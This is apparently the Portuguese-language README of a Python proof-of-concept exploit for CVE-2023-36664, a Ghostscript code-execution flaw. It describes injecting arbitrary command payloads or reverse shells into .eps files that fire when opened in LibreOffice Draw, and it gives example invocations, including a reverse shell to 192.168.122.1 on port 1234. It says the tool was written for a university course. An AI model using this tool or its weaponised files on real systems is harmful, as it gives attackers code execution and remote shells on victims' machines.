
PoC em Python para CVE-2023-36664 RCE do Ghostscript. Injeta payloads ou shells reversos em arquivos .eps para acionar a execução de código via LibreOffice Draw.
Prova de conceito para o CVE-2023-36664.
Para inserir um payload num ficheiro .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Para inserir um payload de reverse shell num ficheiro .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
A abertura do ficheiro injetado no Libreoffice Draw deve acionar o payload.
Esta prova de conceito foi desenvolvida para um curso específico na universidade. É publicada aqui apenas para uso pedagógico.